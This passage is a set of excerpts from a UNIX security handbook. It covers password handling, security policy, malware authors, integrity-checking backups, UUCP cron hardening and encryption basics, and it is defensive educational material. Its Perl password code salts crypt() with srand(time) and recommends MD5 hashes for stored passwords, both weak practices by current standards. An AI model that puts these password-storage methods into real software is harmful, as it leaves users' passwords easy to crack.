may be more susceptible to brute-force guessing attacks than a larger message digest value would be.<br />

A public key digital signature may be thought of as a MAC, too, as it depends on the message digest output and the<br />

secret key. A change in either will result in a change in the overall value of the function.<br />


Chapter 23<br />

Writing Secure SUID and Network Programs

23.5 Tips on Using Passwords<br />

Lots of computer programs use passwords for user authentication. Beyond the standard UNIX password, users soon find

that they have passwords for special electronic mail accounts, special accounting programs, and even fantasy role-playing<br />

games.<br />

Few users are good at memorizing passwords, and there is a great temptation to use a single password for all uses. This is a<br />

bad idea. Users should be encouraged to not type their login password into some MUD that's running over at the local<br />

university, for example.<br />

As a programmer, you can take several steps in programs that ask for passwords to make the process more secure:

1. Don't echo the password as the user types it.

Normally, UNIX turns off echo when people type passwords. You can do this yourself by using the getpass() function. In recent years, however, a trend has evolved to echo asterisks (*) for each character of the password typed. This provides some help for the person typing the password to see if they have made a mistake in their typing, but it also enables somebody looking over the user's shoulders to see how many characters are in the password. (A sketch of one way to read a password without echoing it appears after this list.)

2. When you store the user's password on the computer, encrypt it.

If nothing else, use the crypt() library function. Use random numbers to choose the password's salt. When the user provides a password, check to see if it is the original password by encrypting the provided password with the same salt.

For example, the following bit of simple Perl code takes a password in the $password variable, generates a random salt, and places an encrypted password in the variable $encrypted_password:

$salts = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789./";
srand(time);
local($s1) = int(rand(64));       # index of the first salt character
local($s2) = int(rand(64));       # index of the second salt character
$salt = substr($salts,$s1,1) . substr($salts,$s2,1);
$encrypted_password = crypt($password, $salt);

You can then check to see if a newly provided password is in fact the original password with this simple Perl fragment:

if ($encrypted_password eq crypt($new_password, $encrypted_password)) {
    print "password matched.\n";
}

If you need access to crypt() from a shell script, consider using /usr/lib/makekey, which provides much the same functionality.
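
As mentioned in the first tip above, here is one way to read a password from Perl without echoing it. This is only a sketch, and it assumes the CPAN module Term::ReadKey is installed (getpass() itself is a C library routine):

use strict;
use Term::ReadKey;

print "Password: ";
ReadMode('noecho');                 # turn off echo while the password is typed
chomp(my $password = ReadLine(0));  # 0 = a normal blocking read
ReadMode('restore');                # always restore the terminal mode
print "\n";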


23.5.1 Use Message Digests for Storing Passwords<br />

Instead of using the crypt() function to store an encrypted password, consider using a cryptographic hash function such as<br />

MD5. Using a cryptographic hash allows the user to type a password (or, properly, a passphrase) of any length.<br />

This technique is the one that PGP uses for encrypting files with "conventional cryptography," as well as for encrypting the<br />

secret key that is stored on your hard disk. When you type in a passphrase, this phrase is processed with the MD5 message<br />

digest algorithm (described in Chapter 6). The resulting 128-bit hash is used as the key for the IDEA encryption algorithm.<br />

If you need to be able to verify a password, but you do not need an encryption key, you can store the MD5 hash. When you<br />

need to verify the user's password, take the new value entered by the user, compute the value's MD5, and see if the new<br />

MD5 matches the stored value.<br />

As with the crypt() function, you can include a random salt with the passphrase. If you do so, you must record the salt with<br />

the saved MD5 and use it whenever you wish to verify the user's password.<br />
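
The following Perl sketch shows the idea using Digest::MD5. The "salt:hash" record format, the salt length, and the sample passphrase are our own invention for the example:

use strict;
use Digest::MD5 qw(md5_hex);

# Store: pick a random salt and save "salt:hash-of-salt-plus-passphrase".
sub store_passphrase {
    my ($passphrase) = @_;
    my @chars = ('a'..'z', 'A'..'Z', '0'..'9');
    my $salt  = join '', map { $chars[int(rand(@chars))] } 1 .. 8;
    return "$salt:" . md5_hex($salt . $passphrase);
}

# Verify: recompute the hash with the stored salt and compare.
sub check_passphrase {
    my ($stored, $candidate) = @_;
    my ($salt, $hash) = split /:/, $stored, 2;
    return md5_hex($salt . $candidate) eq $hash;
}

my $record = store_passphrase("correct horse battery staple");
print check_passphrase($record, "correct horse battery staple") ? "match\n" : "no match\n";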

The primary benefit of using a cryptographic hash value is that it accepts whatever input the user types as the password, no matter how long that input might be.[13] This may encourage users to type longer passwords or passphrases that will be resistant to dictionary attacks. You might also remind them of this practice when you prompt them for new passwords.

[13] But remember to check for buffer overflow when reading the password.<br />


Chapter 2
Policies and Guidelines

2.4 Policy

Policy helps to define what you consider to be valuable, and it specifies what steps should be taken to<br />

safeguard those assets.<br />

Policy can be formulated in a number of different ways. You could write a very simple, general policy of<br />

a few pages that covers most possibilities. You could also craft a policy for different sets of assets: a<br />

policy for email, a policy for personnel data, and a policy on accounting information. A third approach,<br />

taken by many large corporations, is to have a small, simple policy augmented with standards and<br />

guidelines for appropriate behavior. We'll briefly outline this latter approach, with the reader's<br />

understanding that simpler policies can be crafted; more information is given in the references.<br />

2.4.1 The Role of Policy<br />

Policy plays three major roles. First, it makes clear what is being protected and why. Second, it clearly

states the responsibility for that protection. Third, it provides a ground on which to interpret and resolve<br />

any later conflicts that might arise. What the policy should not do is list specific threats, machines, or<br />

individuals by name - the policy should be general and change little over time. For example:<br />

Information and information processing facilities are a critical resource for the Big<br />

Whammix Corporation. Information should be protected commensurate with its value to Big<br />

Whammix, and consistent with applicable law. All employees share in the responsibility for<br />

the protection and supervision of information that is produced, manipulated, received, or<br />

transmitted in their departments. All employees likewise share in the responsibility for the<br />

maintenance, proper operation, and protection of all information processing resources of Big<br />

Whammix.<br />

Information to be protected is any information discovered, learned, derived, or handled<br />

during the course of business that is not generally known outside of Big Whammix. This<br />

includes trade secret information (ours, and that of other organizations and companies),<br />

patent disclosure information, personnel data, financial information, information about any<br />

business opportunities, and anything else that conveys an advantage to Big Whammix so<br />

long as it is not disclosed. Personal information about employees, customers, and vendors is<br />

also to be considered confidential and protectable.<br />

All information at Big Whammix, however stored - on computer media, on printouts, in<br />

microfilm, on CD-ROM, on audio or video tape, on photographic media, or in any other<br />


stored, tangible form - is the responsibility of the Chief Information Honcho (CIH). Thus,<br />

Big Whammix facilities should be used only for functions related to the business of Big<br />

Whammix, as determined by the President. The CIH shall be responsible for the protection<br />

of all information and information processing capabilities belonging to Big Whammix,<br />

whether located on company property or not. He will have authority to act commensurate<br />

with this responsibility, with the approval of the President of Big Whammix. The CIH shall<br />

formulate appropriate standards and guidelines, according to good business practice, to<br />

ensure the protection and continued operation of information processing.<br />

Key to note in this example policy is the definition of what is to be protected, who is responsible for<br />

protecting it, and who is charged with creating additional guidelines. This policy can be shown to all<br />

employees, and to outsiders to explain company policy. It should remain current no matter what<br />

operating system is in use, or who the CIH may happen to be.<br />

2.4.2 Standards<br />

Standards are intended to codify successful practice of security in an organization. They are generally<br />

phrased in terms of "shall." Standards are generally platform independent, and at least imply a metric to<br />

determine if they have been met. Standards are developed in support of policy, and change slowly over<br />

time. Standards might cover such issues as how to screen new hires, how long to keep backups, and how<br />

to test UPS systems.<br />

For example, consider a standard for backups. It might state:<br />

Backups shall be made of all online data and software on a regular basis. In no case will<br />

backups be done any less often than once every 72 hours of normal business operation. All<br />

backups should be kept for a period of at least six months; the first backup in January and<br />

July of each year will be kept indefinitely at an off-site, secured storage location. At least<br />

one full backup of the entire system shall be taken every other week. All backup media will<br />

meet accepted industry standards for its type, to be readable after a minimum of five years in<br />

unattended storage.<br />

This standard does not name a particular backup mechanism or software package. It clearly states,<br />

however, what is to be stored, how long it is to be stored, and how often it is to be made.<br />

Consider a possible standard for authentication:<br />

Every user account on each multiuser machine shall have only one person authorized to use<br />

it. That user will be required to authenticate his or her identity to the system using some<br />

positive proof of identity. This proof of identity can be through the use of an approved<br />

authentication token or smart card, an approved one-time password mechanism, or an<br />

approved biometric unit. Reusable passwords will not be used for primary authentication on<br />

any machine that is ever connected to a network or modem, that is portable and carried off<br />

company property, or that is used outside of a private office.<br />


2.4.3 Guidelines<br />

Guidelines are the "should" statements in policies. The intent of guidelines is to interpret standards for a<br />

particular environment - whether that is a software environment, or a physical environment. Unlike<br />

standards, guidelines may be violated, if necessary. As the name suggests, guidelines are not usually used<br />

as standards of performance, but as ways to help guide behavior.<br />

Here is a typical guideline for backups:<br />

Backups on UNIX-based machines should be done with the "dump" program. Backups

should be done nightly, in single-user mode, for systems that are not in 24-hour production<br />

use. Backups for systems in 24-hour production mode should be made at the shift change<br />

closest to midnight, when the system is less loaded. All backups will be read and verified<br />

immediately after being written.<br />

Level 0 dumps will be done for the first backup in January and July. Level 3 backups should<br />

be done on the 1st and 15th of every month. Level 5 backups should be done every Monday<br />

and Thursday night, unless a level 0 or level 3 backup is done on that day. Level 7 backups<br />

should be done every other night except on holidays.<br />

Once per week, the administrator will pick a file at random from some backup made that<br />

week. The operator will be required to recover that file as a test of the backup procedures.<br />

Guidelines tend to be very specific to particular architectures and even to specific machines. Guidelines<br />

also tend to change more often than do standards, to reflect changing conditions.<br />

2.4.4 Some Key Ideas in Developing a Workable Policy<br />

The role of policy (and associated standards and guidelines) is to help protect those items you<br />

(collectively) view as important. They do not need to be overly specific and complicated in most<br />

instances. Sometimes, a simple policy statement is sufficient for your environment, as in the following<br />

example.<br />

The use and protection of this system is everyone's responsibility. Only do things you would<br />

want everyone else to do, too. Respect the privacy of other users. If you find a problem, fix<br />

it yourself or report it right away. Abide by all applicable laws concerning use of the system.<br />

Be responsible for what you do and always identify yourself. Have fun!<br />

Other times, a more formal policy, reviewed by a law firm and various security consultants, is the way<br />

you need to go to protect your assets. Each organization will be different. We know of some<br />

organizations that have volumes of policies, standards, and guidelines for their UNIX systems.

There are some key ideas to your policy formation, though, that need to be mentioned more explicitly.<br />

These are in addition to the two we mentioned at the beginning of this chapter.<br />

2.4.4.1 Assign an owner<br />

Every piece of information and equipment to be protected should have an assigned "owner." The owner<br />

is the person who is responsible for the information, including its copying, destruction, backups, and<br />


other aspects of protection. This is also the person who has some authority with respect to granting<br />

access to the information.<br />

The problem with security in many environments is that there is important information that has no clear<br />

owner. As a result, users are never sure who makes decisions about the storage of the information, or<br />

who regulates access to the information. Information sometimes even disappears without anyone noticing<br />

for a long period of time because there is no "owner" to contact or monitor the situation.<br />

2.4.4.2 Be positive<br />

People respond better to positive statements than to negative ones. Instead of building long lists of "don't<br />

do this" statements, think how to phrase the same information positively. The abbreviated policy<br />

statement above could have been written as a set of "don'ts" as follows, but consider how much better it<br />

read originally:<br />

It's your responsibility not to allow misuse of the system. Don't do things you wouldn't want<br />

others to do, too. Don't violate the privacy of others. If you find a problem, don't keep it a<br />

secret if you can't fix it yourself. Don't violate any laws concerning use of the system. Don't<br />

try to shift responsibility for what you do to someone else and don't hide your identity. Don't<br />

have a bad time!<br />

2.4.4.3 Remember that employees are people too<br />

When writing policies, keep users in mind. They will make mistakes, and they will misunderstand. The<br />

policy should not suggest that users will be thrown to the wolves if an error occurs.<br />

Furthermore, consider that information systems may contain information about users that they would like<br />

to keep somewhat private. This may include some email, personnel records, and job evaluations. This<br />

material should be protected, too, although you may not be able to guarantee absolute privacy. Be<br />

considerate of users' needs and feelings.<br />

2.4.4.4 Concentrate on education<br />

You would be wise to include standards for training and retraining of all users. Every user should have<br />

basic security awareness education, with some form of periodic refresher material (even if the refresher<br />

only involves being given a copy of this book!). Trained and educated users are less likely to fall for<br />

scams and social engineering attacks. They are also more likely to be happy about security measures if<br />

they understand why they are in place.<br />

A crucial part of any security system is giving staff time and support for additional training and<br />

education. There are always new tools and new threats, new techniques, and new information to be<br />

learned. If staff members are spending 60 hours each week chasing down phantom PC viruses and doing<br />

backups, they will not be as effective as staff given a few weeks of training time each year. Furthermore,<br />

they are more likely to be happy with their work if they are given a chance to grow and learn on the job,<br />

and are allowed to spend evenings and weekends with their families instead of trying to catch up on<br />

installing software and making backups.<br />

2.4.4.5 Have authority commensurate with responsibility<br />


Spaf's first principle of security administration:<br />

If you have responsibility for security, but have no authority to set rules or punish violators, your<br />

own role in the organization is to take the blame when something big goes wrong.<br />

Consider the case we heard about in which a system administrator caught one of the programmers trying<br />

to break into the root account of the payroll system. Further investigation revealed that the account of the<br />

user was filled with password files taken from machines around the net, many with cracked passwords.<br />

The administrator immediately shut down the account and made an appointment with the programmer's<br />

supervisor.<br />

The supervisor was not supportive. She phoned the vice-president of the company and demanded that the<br />

programmer get his account back - she needed his help to meet her group deadline. The system<br />

administrator was admonished for shutting down the account and told not to do it again.<br />

Three months later, the administrator was fired when someone broke into the payroll system he was<br />

charged with protecting. The programmer allegedly received a promotion and raise, despite an apparent<br />

ready excess of cash.<br />

If you find yourself in a similar situation, polish up your resumé and start hunting for a new job before<br />

you're forced into a job search by circumstances you can't control.<br />

2.4.4.6 Pick a basic philosophy<br />

Decide if you are going to build around the model of "Everything that is not specifically denied is<br />

permitted" or "Everything that is not specifically permitted is denied." Then be consistent in how you<br />

define everything else.<br />

2.4.4.7 Defend in depth<br />

When you plan your defenses and policy, don't stop at one layer. Institute multiple, redundant,<br />

independent levels of protection. Then include auditing and monitoring to ensure that those protections<br />

are working. The chance of an attacker evading one set of defenses is far greater than the chance of his<br />

evading three layers plus an alarm system.<br />

Four Easy Steps to a More <strong>Sec</strong>ure Computer<br />

Running a secure computer is a lot of work. If you don't have time for the full risk-assessment and<br />

cost-benefit analysis described in this chapter, we recommend that you at least follow these four easy<br />

steps:<br />

1. Decide how important security is for your site. If you think security is very important and that your organization will suffer significant loss in the case of a security breach, the response must be given sufficient priority. Assigning an overworked programmer who has no formal security training to handle security on a half-time basis is a sure invitation to problems.

2. Involve and educate your user community. Do the users at your site understand the dangers and risks involved with poor security practices (and what those practices are)? Your users should know what to do and who to call if they observe something suspicious or inappropriate. Educating your user population helps make them a part of your security system. Keeping users ignorant of system limitations and operation will not increase the system security - there are always other sources of information for determined attackers.

3. Devise a plan for making and storing backups of your system data. You should have off-site backups so that even in the event of major disaster, you can reconstruct your systems. We discuss this more in Chapter 7, Backups, and Chapter 12, Physical Security.

4. Stay inquisitive and suspicious. If something happens that appears unusual, suspect an intruder and investigate. You'll usually find that the problem is only a bug or a mistake in the way a system resource is being used. But occasionally, you may discover something more serious. For this reason, each time something happens that you can't definitively explain, you should suspect a security problem and investigate accordingly.



Chapter 11: Protecting Against Programmed Threats

11.3 Authors

Not much is known about the people who write and install programmed threats, largely because so few<br />

have been identified. Based on those authors who are known to authorities, they can probably be grouped<br />

into a few major categories.<br />

● Employees. One of the largest categories of individuals who cause security problems includes disgruntled employees or ex-employees who feel that they have been treated poorly or who bear some grudge against their employer. These individuals know the potential weaknesses in an organization's computer security. Sometimes they may install logic bombs or back doors in the software in case of future difficulty. They may trigger the code themselves, or have it be triggered by a bug or another employee.

● Thieves. A second category includes thieves and embezzlers. These individuals may attempt to disrupt the system to take advantage of the situation, or to mask evidence of their criminal activity.

● Spies. Industrial or political espionage or sabotage is another reason people might write malicious software. Programmed threats are a powerful and potentially untraceable means of obtaining classified or proprietary information, or of delaying the competition (sabotage), although not very common in practice.

● Extortionists. Extortion may also be a motive, with the authors threatening to unleash destructive software unless paid a ransom. Many companies have been victims of a form of extortion in which they have agreed not to prosecute (and then sometimes go on to hire) individuals who have broken into or damaged their systems. In return, the criminals agree to disclose the security flaws that allowed them to crack the system. An implied threat is that of negative publicity about the security of the company if the perpetrator is brought to trial, and that of additional damage if the flaws are not revealed and corrected.

● Experimenters. Undoubtedly, some programmed threats are written by experimenters and the curious. Other damaging software may be the result of poor judgment and unanticipated bugs.[3] Of course, many accidents can be viewed as criminal, too, especially if they're conducted with reckless disregard for the potential consequences.

[3] This is particularly true of rabbit/bacteria problems.

● Publicity hounds. Another motivation for writing a virus or worm might be to profit, gain fame, or simply derive some ego gratification from the pursuit. In this scenario, someone might write a virus and release it, and then either try to gain publicity as its discoverer, be the first to market software that deactivates it, or simply brag about it on a bulletin board. We do not know if this has happened yet, but the threat is real as more media coverage of computer crime occurs, and as the market for antiviral and security software grows.

● Political activists. One ongoing element in PC virus writing seems to be an underlying political motivation. These viruses make some form of politically oriented statement when run or detected, either as the primary purpose or as a form of smokescreen. This element raises the specter of virus-writing as a tool of political extremists seeking a forum, or worse, the disruption or destruction of established government, social, or business institutions. Obviously, targeting the larger machines and networks of these institutions would serve a larger political goal.

No matter what their numbers or motives, authors of code that intentionally destroys other people's data<br />

are vandals. Their intent may not be criminal, but their acts certainly are. Portraying these people as<br />

heroes or simply as harmless "nerds" masks the dangers involved and may help protect authors who<br />

attack with more malicious intent.<br />



Chapter 7: Backups

7.3 Backing Up System Files

In addition to performing routine backups of your entire computer system, you may wish to make<br />

separate backup copies of system-critical files on a regular basis. These backups can serve several<br />

functions:<br />

● They can help you quickly recover if a vital configuration file is unexpectedly erased or modified.

● They can help you detect unauthorized modifications to critical files, as well as monitor legitimate modifications.

● They make installing a new version of your operating system dramatically easier (especially if you do not wish to use your vendor's "upgrade" facility) by isolating all site-dependent configuration files in a single place.

Ideally, you should back up every file that contains vital system configuration or account information.<br />

Setting up an automatic system for backing up your system files is not difficult. You might, for instance,

simply have a shell script that copies the files /etc/passwd and /usr/etc/aliases into a specially designated<br />

"backup directory" on a regular basis. Or you might have a more sophisticated system, in which a<br />

particular workstation gathers together all of the configuration files for every computer on a network,<br />

archives them in a directory, and sends you email each day that describes any modifications. The choice<br />

is up to you and your needs.<br />
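As a rough illustration of the first approach, here is a minimal sketch of such a copying script. The backup directory name (/usr/adm/private) and the file list are assumptions for the example, not recommendations from this chapter:

    #!/bin/sh
    # Minimal sketch: copy a few critical files into a protected backup directory.
    # Adjust BACKUPDIR and FILES for your own site.
    BACKUPDIR=/usr/adm/private
    FILES="/etc/passwd /usr/etc/aliases"

    for FILE in $FILES
    do
            # Name each copy after the original file (passwd, aliases, ...)
            /bin/cp $FILE $BACKUPDIR/`basename $FILE`
    done

Run from cron, even a script this simple keeps yesterday's copies on hand for comparison.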

7.3.1 What Files to Back Up?<br />

If you are constructing a system for backing up system files on a regular basis, you should carefully<br />

consider which files you wish to archive and what you want to do with them.<br />

By comparing a copy of the password file with /etc/passwd, for example, you can quickly discover if a<br />

new user has been added to the system. But it is also important to check other files. For example, if an<br />

intruder can modify the /etc/rc file, the commands he inserts will be executed automatically the next time<br />

the system is booted. Modifying /usr/lib/crontab can have similar results. (Chapter 11, Protecting<br />

Against Programmed Threats, describes what you should look for in these files.)<br />

Some files that you may wish to copy are listed in Table 7.1.<br />

Table 7.1: Critical System Files That You Should Frequently Back Up

Filename                                                      Things to Look for
/etc/passwd                                                   New accounts
/etc/shadow                                                   Accounts with no passwords
/etc/group                                                    New groups
/etc/rc*                                                      Changes in the system boot sequence
/etc/ttys, /etc/ttytab, or /etc/inittab                       Configuration changes in terminals
/usr/lib/crontab, /usr/spool/cron/crontabs/, or /etc/crontab  New commands set to run on a regular basis
/usr/lib/aliases                                              Changes in mail delivery (especially email
                                                                addresses that are redirected to programs)
/etc/exports (BSD), /etc/dfs/dfstab (SVR4)                    Changes in your NFS filesystem security
/etc/netgroups                                                Changes in network groups
/etc/fstab (BSD), /etc/vfstab (SVR4)                          Changes in mounting options
/etc/inetd.conf                                               Changes in network daemons
UUCP files (in /usr/lib/uucp or /etc/uucp):                   Changes in the UUCP system
  L.sys or USERFILE; Systems or Permissions

7.3.2 Building an Automatic Backup System<br />

For added convenience, keep the backups of all of the system-critical files in a single directory. Make<br />

certain the directory isn't readable by any user other than root, and make sure it has a nonobvious name -<br />

after all, you want the files to remain hidden in the event that an intruder breaks into your computer and<br />

becomes the superuser! If you have a local area network, you may wish to keep the copies of the critical<br />

files on a different computer. An even better approach is to store these files on a removable medium such<br />

as a floppy disk or a cartridge disk that can be mounted when necessary.<br />

You can use tar or cpio to store all of the files that you back up in a single snapshot. Alternatively, you<br />

can also use RCS (Revision Control System) or SCCS (Source Code Control System) to archive these<br />

files and keep a revision history.<br />
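For example, if RCS is installed on your system, a protected archive of checked-in copies might be maintained along these lines. This is only a sketch; the directory name is an assumption, and RCS option handling varies somewhat between versions:

    # Create a private archive directory readable only by root (assumed name).
    mkdir /u/sysadm/private
    chmod 700 /u/sysadm/private
    cd /u/sysadm/private
    mkdir RCS

    # Check a configuration file into RCS, keeping a locked working copy.
    cp /etc/inetd.conf inetd.conf
    ci -l -t-"config backup" -m"initial copy" inetd.conf

    # Later: compare the archived copy against the live file, then check in
    # a new revision if the change was legitimate.
    diff inetd.conf /etc/inetd.conf
    cp /etc/inetd.conf inetd.conf && ci -l -m"authorized change" inetd.conf

    # Review the revision history at any time.
    rlog inetd.conf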

Never Underestimate the Value of Paper<br />

Keeping printed paper copies of your most important configuration files is a good idea. If something<br />

happens to the online versions, you can always refer to the paper ones. Paper records are especially<br />

important if your system has crashed in a severe and nontrivial fashion, because in these circumstances<br />

you may not be able to recover your electronic versions. Finally, paper printouts can prove invaluable in<br />

the event that your system has been penetrated by nefarious intruders, because they form a physical<br />

record. Even the most skilled intruders cannot use a captured account to alter a printout in a locked desk<br />

drawer or other safe location.<br />

A single shell script can automate the checking described above. This script compares copies of specified<br />

files with master copies and prints any differences. The sample script included below keeps two copies of<br />

several critical files and reports the differences. Modify it as appropriate for your own site.<br />


#!/bin/sh
MANAGER=/u/sysadm
FILES="/etc/passwd /etc/group /usr/lib/aliases \
       /etc/rc* /etc/netgroup /etc/fstab /etc/exports \
       /usr/lib/crontab"

cd $MANAGER/private
for FILE in $FILES
do
        /bin/echo $FILE
        BFILE=`basename $FILE`
        /usr/bin/diff $BFILE $FILE
        /bin/mv $BFILE $BFILE.bak
        /bin/cp $FILE $BFILE
done

You can use cron to automate running this daily shell script as follows:[7]

[7] This example assumes that you have a version of cron that allows you to specify the user under which the cron script should be run.

0 0 * * * root /bin/sh /u/sysadm/private/daily | mail -s "daily output" sysadm

NOTE: A significant disadvantage of using an automated script to check your system is that<br />

you run the risk that an intruder will discover it and circumvent it. Nonstandard entries<br />

in /usr/lib/crontab are prime candidates for further investigation by experienced system

crackers.<br />

See Chapter 9, Integrity Management, for additional information about system checking.<br />



Chapter 15: UUCP

15.6 Additional Security Concerns

UUCP is often set up by <strong>UNIX</strong> vendors in ways that compromise security. In addition to the concerns<br />

mentioned in earlier sections, there are a number of other things to check on your UUCP system.<br />

15.6.1 Mail Forwarding for UUCP<br />

Be sure when electronic mail is sent to the uucp user that it is actually delivered to the people who are<br />

responsible for administering your system. That is, there should be a mail alias for uucp that redirects<br />

mail to another account. Do not use a .forward file to do this. If the file is owned by uucp, the file could<br />

be altered to subvert the UUCP system. Instead, use whatever other alias mechanism is supported by<br />

your mailer.<br />
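With sendmail-style aliases, for example, a single entry in the aliases file does the job. The target account shown here (sysadm) is only a placeholder for whoever actually administers UUCP at your site:

    # /usr/lib/aliases (or /etc/aliases on some systems)
    uucp: sysadm

    # Rebuild the alias database after editing the file.
    newaliases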

15.6.2 Automatic Execution of Cleanup Scripts<br />

The UUCP system has a number of shell files that are run on a periodic basis to attempt to redeliver old<br />

mail and delete junk files that sometimes accumulate in the UUCP directories.<br />

On many systems, these shell files are run automatically by the crontab daemon as user root, rather than<br />

user uucp. On these systems, if an attacker can take over the uucp account and modify these shell scripts,<br />

then the attacker has effectively taken over control of the entire system; the next time crontab runs these<br />

cleanup files, it will be executing the attacker's shell scripts as root!<br />

You should be sure that crontab runs all uucp scripts as the user uucp, rather than as the user root.<br />

However, the scripts themselves should be owned by root, not uucp, so that they can't be modified by<br />

people using the uucp programs.<br />
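A quick way to check and correct the ownership of the cleanup script used in the examples below (a sketch only; your UUCP maintenance scripts may live elsewhere and have different names):

    # The script should be owned by root and not writable by uucp or anyone else.
    ls -l /usr/lib/uucp/daily
    chown root /usr/lib/uucp/daily
    chmod 755 /usr/lib/uucp/daily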

If you are running an ancient version of cron that doesn't support separate files for each account, or that doesn't have an explicit user ID field in the crontab file, you should use a su command in the crontab file to set the UID of the cleanup process to that of the UUCP login. Change:

0 2 * * * /usr/lib/uucp/daily

to:

0 2 * * * su uucp -c /usr/lib/uucp/daily

On somewhat newer crontab systems that still don't support a separate crontab file for each user, change this:

0 2 * * * root /usr/lib/uucp/daily

to:

0 2 * * * uucp /usr/lib/uucp/daily

If you are using System V, the invocation of the daily shell script should be in the file /usr/spool/cron/crontabs/uucp, and it should not be in the file /usr/spool/cron/crontabs/root.



Chapter 6: Cryptography

6.2 What Is Encryption?

Encryption is a process by which a message (called plaintext) is transformed into another message (called ciphertext) using a<br />

mathematical function[5] and a special encryption password, called the key.<br />

[5] Although it may not be expressed as such in every case.<br />

Decryption is the reverse process: the ciphertext is transformed back into the original plaintext using a mathematical function and a<br />

key.<br />

Figure 6.1: A simple example of encryption<br />

The process of encryption and decryption is shown in basic terms in Figure 6.1. Here is a simple piece of plaintext:<br />

Encryption can make <strong>UNIX</strong> more secure.<br />

This message can be encrypted with an encryption algorithm known as the Data Encryption Standard (DES), which we describe in a<br />

later section, and the key nosmis to produce the following encrypted message:[6]<br />

[6] Encrypted messages are inherently binary data. Because of the limitations of paper, control characters are printed<br />

preceded by a caret (^), while characters with their most significant bit set are preceded by a M-.<br />

M-itM-@g^B^?^B?^NM-XM-vZIM-U_h^X^$kM-^^sI^^M-f1M-^ZM-jM-gBM-6M->^@M-"=^M-^JM-7M--M-^T<br />

When this message is decrypted with the key nosmis, the original message is produced:<br />

Encryption can make <strong>UNIX</strong> more secure.<br />

If you tried to decrypt the encrypted message with a different key, such as gandalf, you might get the following:<br />

M-&u=:;M-X^G?M-MM-^MM-<br />

M-,M-kM-^?M-R8M-}}pM-?^M^^M-l^ZM-IM-^U0M-D^KM-eMhM-yM-^M-^]M-mM-UM-^ZM-@^^N<br />

Indeed, the only way to decrypt the encrypted message and get printable text is by knowing the secret key nosmis. If you don't know<br />

the key, and you don't have access to a supercomputer, you can't decrypt the text. If you use a strong encryption system, even the<br />

supercomputer won't help you.<br />
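If you want to experiment with this idea on a present-day system, the OpenSSL command-line tool (not the DES utility used for the example above, and not part of the systems this book describes) can perform a comparable password-keyed DES encryption. A minimal sketch:

    # Encrypt a short message with DES, deriving the key from the passphrase
    # "nosmis"; -a emits base64 so the binary ciphertext is printable.
    echo "Encryption can make UNIX more secure." | \
        openssl enc -des-cbc -k nosmis -a > message.enc

    # Decrypting with the correct passphrase recovers the plaintext...
    openssl enc -des-cbc -d -k nosmis -a < message.enc

    # ...while the wrong passphrase yields an error or garbage.
    openssl enc -des-cbc -d -k gandalf -a < message.enc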


6.2.1 What You Can Do with Encryption<br />

Encryption can play a very important role in your day-to-day computing and communicating:<br />

● Encryption can protect information stored on your computer from unauthorized access - even from people who otherwise have access to your computer system.

● Encryption can protect information while it is in transit from one computer system to another.

● Encryption can be used to deter and detect accidental or intentional alterations in your data.

● Encryption can be used to verify whether or not the author of a document is really who you think it is.

Despite these advantages, encryption has its limits:

● Encryption can't prevent an attacker from deleting your data altogether.

● An attacker can compromise the encryption program itself. The attacker might modify the program to use a key different from the one you provide, or might record all of the encryption keys in a special file for later retrieval.

● An attacker might find a previously unknown and relatively easy way to decode messages encrypted with the algorithm you are using.

● An attacker could access your file before it is encrypted or after it is decrypted.

For all these reasons, encryption should be viewed as a part of your overall computer security strategy, but not as a substitute for<br />

other measures such as proper access controls.<br />

6.2.2 The Elements of Encryption<br />

There are many different ways that you can use a computer to encrypt or decrypt information. Nevertheless, each of these so-called<br />

encryption systems share common elements:<br />

Encryption algorithm
    The encryption algorithm is the function, usually with some mathematical foundations, which performs the task of encrypting and decrypting your data.

Encryption keys
    Encryption keys are used by the encryption algorithm to determine how data is encrypted or decrypted. Keys are similar to computer passwords: when a piece of information is encrypted, you need to specify the correct key to access it again. But unlike a password program, an encryption program doesn't compare the key you provide with the key you originally used to encrypt the file, and grant you access if the two keys match. Instead, an encryption program uses your key to transform the ciphertext back into the plaintext. If you provide the correct key, you get back your original message. If you try to decrypt a file with the wrong key, you get garbage.[7]

    [7] Of course, we are assuming that your original message wasn't garbage, too. Otherwise, everything you would decrypt would probably appear as garbage!

Key length
    As with passwords, encryption keys have a predetermined length. Longer keys are more difficult for an attacker to guess than shorter ones because there are more of them to try in a brute-force attack. Different encryption systems allow you to use keys of different lengths; some allow you to use variable-length keys.

Plaintext
    The information which you wish to encrypt.

Ciphertext
    The information after it is encrypted.


6.2.3 Cryptographic Strength<br />

Different forms of cryptography are not equal. Some systems are easily circumvented, or broken. Others are quite resistant to even<br />

the most determined attack. The ability of a cryptographic system to protect information from attack is called its strength. Strength<br />

depends on many factors, including:<br />

● The secrecy of the key.

● The difficulty of guessing the key or trying out all possible keys (a key search). Longer keys are generally harder to guess or find.

● The difficulty of inverting the encryption algorithm without knowing the encryption key (breaking the encryption algorithm).

● The existence (or lack) of back doors, or additional ways by which an encrypted file can be decrypted more easily without knowing the key.

● The ability to decrypt an entire encrypted message if you know the way that a portion of it decrypts (called a known text attack).

● The properties of the plaintext and knowledge of those properties by an attacker. (For example, a cryptographic system may be vulnerable to attack if all messages encrypted with it begin or end with a known piece of plaintext. These kinds of regularities were used by the Allies to crack the German Enigma cipher during the Second World War.)

The goal in cryptographic design is to develop an algorithm that is so difficult to reverse without the key that it is at least roughly<br />

equivalent to the effort required to guess the key by trying possible solutions one at a time. We would like this property to hold even<br />

when the attacker knows something about the contents of the messages encrypted with the cipher. Some very sophisticated<br />

mathematics are involved in such design.<br />

6.2.4 Why Use Encryption with <strong>UNIX</strong>?<br />

You might wonder why you need encryption if you are already using an operating system similar to <strong>UNIX</strong> that has passwords and<br />

uses file permissions to control access to sensitive information. The answer to this question is a single word: the superuser.<br />

A person with access to the <strong>UNIX</strong> superuser account can bypass all checks and permissions in the computer's filesystem. But there is<br />

one thing that the superuser cannot do: decrypt a file properly encrypted by a strong encryption algorithm without knowing the key.<br />

The reason for this limitation is the very difference between computer security controls based on file permissions and passwords, and<br />

controls based on cryptography. When you protect information with the <strong>UNIX</strong> filesystem, the information that you are trying to<br />

protect resides on the computer "in the clear." It is still accessible to your system manager (or someone else with superuser access), to<br />

a malicious computer hacker who manages to find a fault with your computer's overall security, or even to a thief who steals your<br />

computer in the night. You simply can't ensure that the data on your computer will never fall into the wrong hands.<br />

When you protect information with encryption, the information is protected by the secrecy of your key, the strength of the encryption<br />

